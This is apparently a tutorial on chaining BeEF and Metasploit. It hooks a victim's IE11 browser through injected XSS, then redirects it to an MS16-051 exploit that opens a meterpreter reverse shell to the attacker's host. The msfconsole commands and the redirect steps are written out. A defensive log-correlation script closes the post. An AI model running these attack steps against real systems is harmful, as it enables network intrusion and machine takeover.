The BeEF Browser Exploitation Framework is a useful tool for browser exploitation. It can be used to hook a victim's browser, and from there we can perform all sorts of malicious actions against that browser. In the last article we integrated Metasploit with BeEF. Now we will use our newly integrated framework to redirect a victim's browser to a Metasploit exploit. In this case we will be using MS16-051 to exploit Internet Explorer 11 on Windows 10 x64.
To begin, we need to fire up BeEF and Metasploit as we did in the last article.
service postgresql start && msfconsole
msf> load msgrpc ServerHost=10.1.100.131 Pass=abc123 SSL=y
cd /usr/share/beef-xss && ./beef
Now we can access the BeEF user interface.
Hooking the Browser
Let's say James logs in to an interface for employees to exchange emails and attachments which is exposed to the internet. The authentication form contains a stored XSS vulnerability. The attacker would simply inject a malicious XSS redirect into the authentication form so that the next time James visits the page, his browser is redirected to BeEF's hook.js.
Upon visiting the page, his browser will be silently redirected to our browser hook. Once hooked, it should appear in the 'Online Browsers' tab, as well as in the BeEF output in the console you started it in.
As you can see, there is a lot of information displayed on the 'Details' page about the victim's browser and operating system. In this case, we can see that the victim is running IE 11 on Windows 10. That's good to know, because there happens to be a browser exploit module matching that name and version.
Preparing the Exploit
To actually make this work, we need to set the exploit up in msfconsole.
msf> use exploit/windows/browser/ms16_051_vbscript
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set SRVHOST 10.1.100.131
msf> set LHOST 10.1.100.131
msf> set URIPATH hax
Here we select the exploit, set the appropriate payload (making sure to use the x64 meterpreter shell to match the target), and set the listen host and server host to our own address, where the exploit is hosted. The URIPATH is the path of the actual browser exploit. If left alone this would be set to a random string. I chose to set it to hax because it's simple to type and remember, which also makes it easy to add to BeEF later. Once we run the 'exploit' command, the listener will start.
Once the exploit starts, it will be hosted at http://10.1.100.131:8080/hax. This is where we will need to redirect the victim's browser.
So, we've hooked the browser and prepared our exploit. There are a few ways we can get the exploit to run. The first way is to find the exploit in BeEF, make its settings match the exploit we ran in msfconsole above, and fire it at the victim.
Once the exploit has been executed, you will see a message from BeEF in the console you started it in saying that the exploit has been sent to the target, as well as the exploit interacting with the victim in msfconsole. The exploit takes some time, but eventually we receive a meterpreter session on the victim. Now you have a foothold into the target network. From here you can escalate privileges and move laterally throughout the network.
Sometimes I've found that method to be less than reliable. If this is the case, you can always use BeEF's browser redirect capability to send the victim straight to the exploit hosted on your server.
Once this is executed, the user should be redirected to the exploit and you should be granted a meterpreter session. Keep in mind that this method is not very stealthy, as the victim will be able to see their browser being redirected. You can get a general idea of how well a module will perform based on the color next to it. Read the 'Getting Started' page for more details.
This has been a quick example of gaining a foothold into a network by exploiting a user's browser inside the network. Doing this may allow you to create an entry point into a seemingly impenetrable network. This attack was carried out against a Windows 10 machine running IE 11; however, as software changes, current builds of Windows 10 and Internet Explorer may not be vulnerable in the same way, or at all.
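The two events described above, the hook.js fetch triggered by the injected script on an internal page and the later redirect of the hooked browser to the exploit URL, are also what a defender can correlate in web proxy logs. The following is an added example, not code from the original article or from BeEF, that flags both per client; the log format, the trusted-host allowlist and the log lines are constructed assumptions.

```python
"""Correlate BeEF-style hook.js loads with follow-on redirects in proxy logs."""
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed log lines (assumed format: "time client method url referer").
SAMPLE_LOG = """\
2016-09-01T10:00:00 10.1.100.50 GET http://mail.corp.local/login -
2016-09-01T10:00:01 10.1.100.50 GET http://10.1.100.131:3000/hook.js http://mail.corp.local/login
2016-09-01T10:00:03 10.1.100.50 POST http://10.1.100.131:3000/dh?v=1 http://mail.corp.local/login
2016-09-01T10:00:40 10.1.100.50 GET http://10.1.100.131:8080/hax http://mail.corp.local/login
2016-09-01T10:05:00 10.1.100.51 GET http://mail.corp.local/login -
2016-09-01T10:05:02 10.1.100.51 GET http://cdn.corp.local/app.js http://mail.corp.local/login
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")
TRUSTED_HOSTS = {"mail.corp.local", "cdn.corp.local"}  # constructed allowlist
WINDOW = timedelta(minutes=5)  # how long after a hook to watch the client


def parse(line):
    """Split one log line into fields; returns None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, referer = m.groups()
    u = urlparse(url)
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "url": url, "host": u.hostname, "path": u.path,
            "referer_host": urlparse(referer).hostname if referer != "-" else None}


def detect(log_text):
    """Return (rule, client, url) alerts for hooks and post-hook contacts."""
    hooked = {}  # client -> time its browser pulled hook.js
    alerts = []
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None or ev["host"] in TRUSTED_HOSTS:
            continue
        # Rule 1: a trusted page loading hook.js from an untrusted origin = injected hook
        if ev["path"].endswith("/hook.js") and ev["referer_host"] in TRUSTED_HOSTS:
            hooked[ev["client"]] = ev["ts"]
            alerts.append(("hook", ev["client"], ev["url"]))
            continue
        # Rule 2: any untrusted contact by a hooked client inside the window
        # (BeEF polling, or the redirect to the exploit server)
        t0 = hooked.get(ev["client"])
        if t0 is not None and ev["ts"] - t0 <= WINDOW:
            alerts.append(("post_hook", ev["client"], ev["url"]))
    return alerts
```

Running detect(SAMPLE_LOG) yields one "hook" alert followed by two "post_hook" alerts for 10.1.100.50, the last of them the :8080/hax exploit URL, while 10.1.100.51 produces nothing.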